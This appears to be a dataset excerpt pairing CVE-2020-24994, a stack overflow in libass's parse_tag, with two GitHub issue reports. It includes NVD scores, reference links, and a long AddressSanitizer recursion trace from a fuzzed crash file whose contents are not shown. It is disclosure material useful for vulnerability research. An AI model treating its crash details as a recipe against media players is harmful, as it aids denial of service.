cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2020-24994
2021-03-23T20:15:13.073
Stack overflow in the parse_tag function in libass/ass_parse.c in libass before 0.15.0 allows remote attackers to cause a denial of service or remote code execution via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/commit/6835731c2fe4164a0c50bc91d12c43b2a2b4e" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/422" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/422#issuecomment-806002919" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/423" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/commit/6835731c2fe4164a0c50bc91d12c43b2a2b4e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/422" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/422#issuecomment-806002919" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/423" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libass_project:libass:*:*:*:*:*:*:*:*", "matchCriteriaId": "EFE0DEE3-A9C6-4008-BB80-4B5A6D9B0B4E", "versionEndExcluding": "0.15.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/libass/libass/issues/422#issuecomment-806002919
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libass", "libass" ]
**Description** A vulnerability was found in function parse_tag in ass_parse.c:234 ,which allow attackers to cause a denial of service or remote code execution via a crafted file. test@test:~/libass-0.14.0/afl$ ./a.out crash/poc ======================= INFO ========================= This binary is built for AFL-fuzz. To run the target function on individual input(s) execute this: ./a.out < INPUT_FILE or ./a.out INPUT_FILE1 [INPUT_FILE2 ... ] To fuzz with afl-fuzz execute this: afl-fuzz [afl-flags] ./a.out [-N] ``` afl-fuzz will run N iterations before re-spawning the process (default: 1000) ====================================================== Reading 50635 bytes from crash/poc ASAN:DEADLYSIGNAL ================================================================= ==64283==ERROR: AddressSanitizer: stack-overflow on address 0x7fff99b2bff8 (pc 0x00000046724b bp 0x7fff99b2fcf0 sp 0x7fff99b2c000 T0) #0 0x46724a in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:234 #1 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #2 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #3 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #4 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #5 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #6 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #7 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #8 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #9 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #10 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #11 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #12 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #13 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #14 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #15 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #16 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #17 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #18 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #19 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #20 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #21 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #22 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #23 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #24 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #25 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #26 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #27 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #28 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #29 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #30 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #31 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #32 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #33 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #34 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #35 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #36 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #37 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #38 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #39 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #40 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #41 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #42 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #43 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #44 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #45 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #46 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #47 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #48 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #49 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #50 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #51 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #52 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #53 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #54 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #55 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #56 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #57 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #58 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #59 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #60 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #61 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #62 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #63 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #64 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #65 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #66 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #67 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #68 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #69 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #70 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #71 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #72 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #73 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #74 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #75 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #76 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #77 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #78 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #79 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #80 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #81 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #82 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #83 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #84 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #85 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #86 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #87 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #88 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #89 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #90 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #91 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #92 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #93 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #94 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #95 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #96 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #97 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #98 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #99 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #100 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #101 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #102 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #103 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #104 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #105 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #106 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #107 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #108 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #109 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #110 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #111 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #112 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #113 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #114 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #115 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #116 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #117 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #118 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #119 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #120 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #121 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #122 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #123 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #124 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #125 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #126 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #127 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #128 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #129 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #130 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #131 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #132 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #133 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #134 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #135 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #136 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #137 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #138 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #139 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #140 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #141 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #142 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #143 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #144 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #145 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #146 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #147 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #148 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #149 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #150 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #151 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #152 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #153 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #154 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #155 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #156 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #157 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #158 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #159 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #160 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #161 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #162 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #163 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #164 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #165 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #166 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #167 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #168 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #169 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #170 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #171 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #172 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #173 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #174 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #175 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #176 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #177 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #178 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #179 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #180 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #181 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #182 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #183 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #184 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #185 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #186 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #187 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #188 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #189 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #190 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #191 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #192 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #193 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #194 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #195 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #196 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #197 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #198 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #199 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #200 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #201 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #202 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #203 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #204 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #205 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #206 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #207 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #208 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #209 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #210 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #211 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #212 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #213 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #214 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #215 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #216 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #217 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #218 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #219 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #220 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #221 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #222 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #223 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #224 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #225 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #226 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #227 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #228 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #229 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #230 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #231 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #232 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #233 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #234 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #235 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #236 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #237 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #238 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #239 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #240 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #241 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #242 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #243 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #244 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #245 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #246 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #247 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #248 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #249 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 #250 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654 SUMMARY: AddressSanitizer: stack-overflow /home/test/libass-0.14.0/libass/ass_parse.c:234 in parse_tag ==64283==ABORTING ```
stack-overflow on ass_parse.c:234 *parse_tag
https://api.github.com/repos/libass/libass/issues/422/comments
5
2020-08-27T02:18:39Z
2021-04-20T01:05:07Z
https://github.com/libass/libass/issues/422
686,885,373
422
1,771
CVE-2020-24994
2021-03-23T20:15:13.073
Stack overflow in the parse_tag function in libass/ass_parse.c in libass before 0.15.0 allows remote attackers to cause a denial of service or remote code execution via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/commit/6835731c2fe4164a0c50bc91d12c43b2a2b4e" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/422" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/422#issuecomment-806002919" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/423" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/commit/6835731c2fe4164a0c50bc91d12c43b2a2b4e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/422" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/422#issuecomment-806002919" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/libass/libass/issues/423" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libass_project:libass:*:*:*:*:*:*:*:*", "matchCriteriaId": "EFE0DEE3-A9C6-4008-BB80-4B5A6D9B0B4E", "versionEndExcluding": "0.15.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/libass/libass/issues/423
[ "Third Party Advisory" ]
github.com
[ "libass", "libass" ]
**Description** A vulnerability was found in function mystrcmp in ass_parse.c:77 ,which allow attackers to cause a denial of service or remote code execution via a crafted file.
stack-overflow on ass_parse.c:77 mystrcmp
